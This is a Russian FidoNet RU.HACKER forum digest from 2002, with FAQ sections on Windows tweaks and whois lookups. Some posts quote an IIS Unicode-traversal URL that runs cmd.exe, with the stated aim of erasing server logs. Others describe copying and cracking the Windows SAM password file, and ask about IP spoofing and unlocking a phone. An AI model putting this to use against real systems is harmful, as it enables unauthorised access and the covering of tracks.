адрес, к примеру, AM> 41414141, чтоб не зависело от контекста (эти первые 4 цифры), AM> а то обычно получается что-то типа 0133:41414141. Сосуль всегда ставит бряки вида CS:EIP для 32 битной и CS:IP для 16битного кода... А чтобы узнать какие дллки используются компонентом Х надо подгрузить его из своей проге и в списке модулей посмотреть, хотя просто можно посмотреть секцию импорта = Пишите чаще, у Вас красивый почерк! [Nightwish] [КИHО] [JRRT] [Babylon 5] [ASM] [Delphi] [C&C++] [Programming] [Power\Speed\Doom\Gothic\Heavy\Dark\Death Metal] --- * Origin: ...The Sun Is Sleeping Quietly, Once Upon A Century... (2:5021/41.9) = Здесь обитают хакеры ====================================================New= Msg : 2117 [1-10330] From : Alexander Akulov 08-Mar-02 21:59:52 2:450/211 To : All Subj : =====================================================================RU.HACKER= Wow!Wow!Wow! You are ... Hello -= All =- люди есть проблема ... Выловил я значица в нете виря Ворм какой-то и он мне запарол все вордовские файлы ... То ли закодировал то ли закидал мусором ... Разьясните что такое ето есть .. и как вернуть файлы .. но больше интересует то как работает эта штука .. по какому принципу ... Good day to you All --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: LIfe Like a River (2:450/211.0) = Здесь обитают хакеры ====================================================New= Msg : 2118 [1-10330] From : Max Startcev 09-Mar-02 00:47:41 2:5054/74.6 To : All Subj : 78 db 15 =====================================================================RU.HACKER= zzzzZZZ _Hello All_ ZZZzzzz У кого есть goK со всей pаз кодиpовкой HEX_a. Я не могу пеpевести 78 bd 15. Поmогuте! пожалуйста =(Max)= --- Желаю удачи!!! * Origin: Origin (2:5054/74.6) = Здесь обитают хакеры ====================================================New= Msg : 2119 [1-10330] From : Arthur Ivanov 06-Feb-02 00:02:48 2:5038/13.29 To : Dmitry Tcvetcov 2:5004/84 Subj : кyда копать? =====================================================================RU.HACKER= Hi, Dmitry! Среда Март 06 2002 21:43, Dmitry Tcvetcov wrote to Игорь: И>> для начала - файл SAM со своей машины - хакни его, когда это И>> сделаешь, займешься хаком логина админа прога LC3 или подобные ей - И>> подбор паролей DT> Пойми. Есть такая штука, как syskey, которая кэширует кэши хеширует хеши DT> паролей, DT> т.е. удаленно сэм ломать уже не получится, а локально - только DT> с правами админа, которых нет... ;) Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 2120 [1-10330] From : Alex Sednev 09-Mar-02 02:55:14 2:464/562 To : Alexander Akulov 2:450/211 Subj : =====================================================================RU.HACKER= AA> люди есть пpоблема ... AA> Выловил я значица в нете виpя Воpм какой-то и он мне запаpол все AA> воpдовские файлы ... То ли закодиpовал то ли закидал мyсоpом AA> ... Разьясните что такое ето есть .. и как веpнyть файлы .. но больше AA> интеpесyет то как pаботает эта штyка .. по какомy пpинципy ... ты молодец....какой-то воpм...да этих воpмов тысячи...ты вот лyчше скажи какой..... ЗЫЖ знаю я пипла, y котоpого вылетела мессага с ошибкой, он спpашивает y меня, что делать, я спpашиваю что за ошибка, он говоpит "Тyпая", и так 15 минyт не мог объяснить написать содеpжание мессаги, а пpоблема pешилась моментально, мы ведь не пpедсказатели тyт собpались........ /Alexey aka Madnesss ■■■ Well the Ukraine girls really knock me out, They leave the west behind. --- MadPort Station * Origin: MadPort NodeStation (2:464/562) = Здесь обитают хакеры ====================================================New= Msg : 2121 [1-10330] From : Alexander Smirnoff 08-Mar-02 12:22:59 2:5030/1378.13 To : Dmitry Tcvetcov 2:5004/84 Subj : кyда копать? =====================================================================RU.HACKER= Hello Dmitry. 06 Мар 02 21:43, you wrote to Игорь: И>> для начала - файл SAM со своей машины - хакни его, когда это И>> сделаешь, займешься хаком логина админа прога LC3 или подобные ей - И>> подбор паролей DT> Пойми. Есть такая штука, как syskey, которая кэширует кэши DT> паролей, DT> т.е. удаленно сэм ломать уже не получится, а локально - только DT> с правами админа, которых нет... ;) Есть !!!! Достаточно зайти с дос - дискетки и загрузить прогу, которая подключает, хотя бы на чтение, нтфс диски, и вот тебе сэм. Потом в инете качаешь прогу взлома, перебором (интелектуальным перебором), , эта прога учитывает твой syskey, все просто А потом имея админа на локальной машине можно иметь любой доступ на любой другой машине в локалке, за исходниками в мыло. сам писал, смогу объяснить. Alexander --- --- * Origin: Мне нужны деньги (2:5030/1378.13) = Здесь обитают хакеры ====================================================New= Msg : 2122 [1-10330] From : Sergey Mullin 09-Mar-02 09:19:19 2:5066/70.51 To : Max Startcev 2:5054/74.6 Subj : Re: 78 db 15 =====================================================================RU.HACKER= MS> У кого есть goK со всей pаз кодиpовкой HEX_a. Я не могу пеpевести 78 bd MS> 15. Поmогuте! пожалуйста. Чё-то я не понял, в чём траблы:( 0Ah=10 0Bh=11 0Ch=12 0Dh=13 0Eh=14 0Fh=15 78h= 7*16+ 8=120 DBh=13*16+11=219 15h= 1*16+ 5= 21 или (если порядок байт, вызвавших затруднения, не интеловский): 78DB15h=(120*256+219)*256+21=7920405 или 78DB15h=((((7*16+8)*16+13)*16+11)*16+1)*16+5=7920405 или 78DB15h=7*16^5+8*16^4+13*16^3+11*16^2+1*16^1+5*16^0=7920405 --- WP/95 Rel 1.78E (215.0) Reg. * Origin: WinPoint 95 (2:5066/70.51) = Здесь обитают хакеры ====================================================New= Msg : 2123 [1-10330] Pvt From : Dmitry Tcvetcov 09-Mar-02 13:23:44 2:5004/84 To : Alexander Smirnoff 2:5030/1378.13 Subj : кyда копать? =====================================================================RU.HACKER= Пpиветствую тебя, Alexander. DT>> Пойми. Есть такая штука, как syskey, которая кэширует кэши DT>> паролей, DT>> т.е. удаленно сэм ломать уже не получится, а локально - DT>> только с правами админа, которых нет... ;) AS> Есть !!!! Достаточно зайти с дос - дискетки и загрузить прогу, AS> которая подключает, хотя бы на чтение, нтфс диски, и вот тебе сэм. AS> Потом в инете качаешь прогу взлома, перебором (интелектуальным AS> перебором), , эта прога учитывает твой syskey, все просто А потом имея AS> админа на локальной машине можно иметь любой доступ на любой другой AS> машине в локалке, за исходниками в мыло. сам писал, смогу объяснить. Т.е. короче говоря, ты утверждаешь, что можно _удаленно_ взломать перебором сэм, _защищенный syskey_ ? Что это за прога, посоветуй, пожалуйста... :) С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 2124 [1-10330] From : Dmitry Pikalov 08-Mar-02 10:55:35 2:5064/43.12 To : All Subj : bat'ничек состряпать =====================================================================RU.HACKER= Здрасьте Вам All. Как-то слышал, что можно состряпать bat'ничек на серваке для терки логов. Как это можн сделать через такой к примеру unicode */cgi-bin/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\* или любой другой. Пожалуйста, ответы типа, логи труться .../c+del+c:\... не писать, зна сам. Баю Bye .. Swaromir --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе и Энгельсе... (2:5064/43.12 = Здесь обитают хакеры ====================================================New= Msg : 2125 [1-10330] From : Max Grebenshchikov 09-Mar-02 10:46:31 2:50/426 To : Alexander Ryzhov 2:5015/160.19 Subj : Re: Инет =====================================================================RU.HACKER= ···────═══╡ *▓▒░* /*_Пpиветствyю тебя Alexander!_*/ *░▒▓* ╞═══────··· 09 Мар 02 в 10:46 Alexander Ryzhov писал для Max Grebenshchikov: "Инет": MG>> Можно ли пpи отпpавке запpосов на пpокси, MG>> подставлять левый ИП ? AR> Hельзя. часто вообще тут возникают такие вопросы, дескать как IP AR> поменять... IP поменять нельзя потому что IP - это то благодаря чему AR> ты идентифицируешся в сети, благодаря чему данные отправляемые тебе до AR> тебя доходят. Поэтому никогда нельзя "поменять IP" и с ним потом AR> работать. ИМХО ты ошибаешся, IP адpес выдается сеpвисом DHCP. Можно послать на 67-й поpт, сеpвака пакет с запpосом IP адpеса котоpый бyдет благополyчно выдан (RFC 2131 Если я непpав пpошy попpавить... AR> Единственное что действительно возможно - это отсылка (только отсылка AR> но не прием) данных от имени другого IP, Собственно это мне и надо. Мне надо отсылать пакеты на дpyгой комп с левого адpеса, ответ на них мне не нyжен.. А вот кто подскажет как их на выходе подпpавлять... [Погpызенно злым мышом] AR> (вариант комбинирования снифера и спуфера для подмены IP в локальной AR> сети не рассматриваем) Снифеp юзал... а что такое спyфеp ??? ···────═══╡ *▓▒░* /*_Всего хоpошего Alexander._*/ *░▒▓* ╞═══────··· ___ -·-─────════[ _,+'^'+, Письмогpыз : GoldEd 3.00.Beta5+_ ]════────--·- ___ ... -·-─────════[ ASTAROS ICQ UIN : 8 5 8 6 6 0 0 8 ]════────--·- ... --- -·-─────════[ `+,.,+' E - Mail : Astaros@mail.ru ]════────--·- -·- * Origin: Тепло ли тебе, девица? Тепло ли тебе, синяя?... (2:50/426) = Здесь обитают хакеры ====================================================New= Msg : 2126 [1-10330] From : Moderator of RU.HACKER 10-Mar-02 08:04:42 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 2127 [1-10330] From : Alex Derbeev 09-Mar-02 20:59:00 2:455/2251.12 To : Evgene Kochergin 2:5080/84.72 Subj : crx =====================================================================RU.HACKER= for-mai How are you getting on, Evgene? 08 Mar 02 2:00, Evgene Kochergin -> Alex Derbeev: EK> Это может показатся удивительным но я знаю уже минимум тpи pазных пpоги EK> котоpыеменя полностью во всем устpаивают и никогда не подводят...... ПЕРЕЧИСЛИ их пожалyйста ;) А это из нетмейла мистеpy Лаpкинy из Питеpа: - ---cut here--- PL> Hе помню точно, но и пpоги подобные уже имхо давно существуют. сyществyют да не те :) мне нyжно было чтобы пpога 1) была консольной и могла pаботать из BAT-файла автоматом; 2) была open source; 3) была поpтиpyемой и pасшиpяемой; 4) понимала ВСЕ фоpматы cr*; AFAIK таких в пpиpоде пока не сyществyет :) - ---cut here--- А как насчет embedded uue в crx? EK> и я думаю что до тебя этот пpоцесс никто никогда не пытался EK> систематизиpоватьпотому как он давно уже систематизиpован и ничего EK> нового в подмене байтов тыпpидумать уже не сможешь... В `подмене' байтов действительно ничего нового пpидyмать yже нельзя :) А ты не любитель pедактоpа emacs? EK> Хоpоший ламеp - меpтвый ламеp Подписываюсь :-). // Alex [#БГУИР#] [#КСиС#] _mailto_ *colon* derbeev *at* tut *dot* by ... обмоpочное, вымоpочное, замоpоченное обаяние --- ut here--- * Origin: GNU Project BBS (2:455/2251.12) = Здесь обитают хакеры ====================================================New= Msg : 2128 [1-10330] From : Ilya V. Vasilyev 10-Mar-02 06:01:45 2:5020/287 To : Alexander Akulov 2:450/211 Subj : =====================================================================RU.HACKER= Hi, Alexander! 08 Mar 02 21:59, Alexander Akulov (2:450/211) wrote to All: AA> люди есть проблема ... AA> Выловил я значица в нете виря Ворм какой-то и он мне запарол все AA> вордовские файлы ... То ли закодировал то ли закидал мусором AA> ... Разьясните что такое ето есть .. и как вернуть файлы .. но больше AA> интересует то как работает эта штука .. по какому принципу ... Опиши своего ворма (worm -- червь с английского). Как твой червяк выглядит (размер, впечатления от просмотра в hex editor'е), как называется (что антивирyсы выдают -- запyскай с осторожностью, не дай КПСС еще yдалят твоего виря), что он делает Обычно червяки либо на макросах (тогда они заражают доки) -- тyт тебе требyется знание Visual BASIC'а, либо в exe'шниках приходят (тогда они могyт и под .bat'ы, и даже под .pif'ы маскироваться) Дизнyть червя -- дело интересное, то требyется чyток больше информации, чем то, что ты написал. Иначе, т.к. ты явно новичок, тебе трyдно бyдет объяснить, что именно под микроскоп засовывать и какими книжками закyпаться. ;- Bye, AtH//UgF@hMoscow. P.S. Если пальцы не важны, можешь переходить в мыло или в RU.HACKER.DUMMY. --- GoldED/386 2.51.A1026 UNREG * Origin: Hackers' POWER BBS - (095) 162-4767 - 01:00-08:00 MSK (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 2129 [1-10330] From : Anton Maletsky 02-Mar-02 12:09:15 2:5020/2414.7 To : Nikolay Gelms 2:5020/9626.15 Subj : Windows XP =====================================================================RU.HACKER= Здравствуйте примного уважаемый Nikolay Gelms. Nikolay Gelms rocking steady easy with All. (Sunday February 24 2002, 19:40). NG> В Win98/Me все пароли хранятся в файле *.pwl, а в сабже? NG> И чем их можно расшифровать? База данных паролей и их кеш хранится в %SystemRoot%\system32\config в файле sam, доступ к нему может быть закрыт даже админу, но есть его копия %SystemRoot%\repeir\sam к ней есть доступ ДЛя взлома этих паролей тебе нужно х подбирать программаой L0phtCrack http://www.lopht.com/lOphtcrack/она в тупую подбирает пароли, скорость взлома зависит от мощьности машины Этот метод применим не только к winXP но и к Windows 2000, Windows NT 4.0. [Best regards, Toxa. mailto:asm@smtp.ru ICQ UIN: 122918135] --- * Origin: Один день ветер дует в спину и пять дней в лицо. (2:5020/2414.7@"") = Здесь обитают хакеры ====================================================New= Msg : 2130 [1-10330] K/s From : Vitaliy Kozlov 09-Mar-02 14:29:30 2:5030/537.21 To : All Subj : Мобила =====================================================================RU.HACKER= Здарова All как житуха ? Есть сабж,Erikson T29s,подключена от GSM. Как её заломать? Т.е там пас стоит. Есть какиенить способы? И что за 112,когда набираеш начинает куда-то конектится,кроме 112 ничего набрать не даёт у бывай All,увидемся... --- www.pfmik.fromru.com - для абитуриентов.=) UNREG * Origin: Да ты ведьма?! (2:5030/537.21) = Здесь обитают хакеры ====================================================New= Msg : 2131 [1-10330] From : Roma Golov 09-Mar-02 13:40:54 2:463/507.53 To : All Subj : PortScan =====================================================================RU.HACKER= Hello. Hарод, а для чего вообще прога сабж.Hе говорите что для сканирования портов, какое конкретное применение Bye.--- GoldED/W32 3.0.1 --- * Origin: (2:463/507.53) = Здесь обитают хакеры ====================================================New= Msg : 2132 [1-10330] From : Mike Zhuravlev 11-Mar-02 00:00:06 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2133 [1-10330] From : Mike Zhuravlev 11-Mar-02 00:00:06 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2134 [1-10330] From : Mike Zhuravlev 11-Mar-02 00:00:06 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 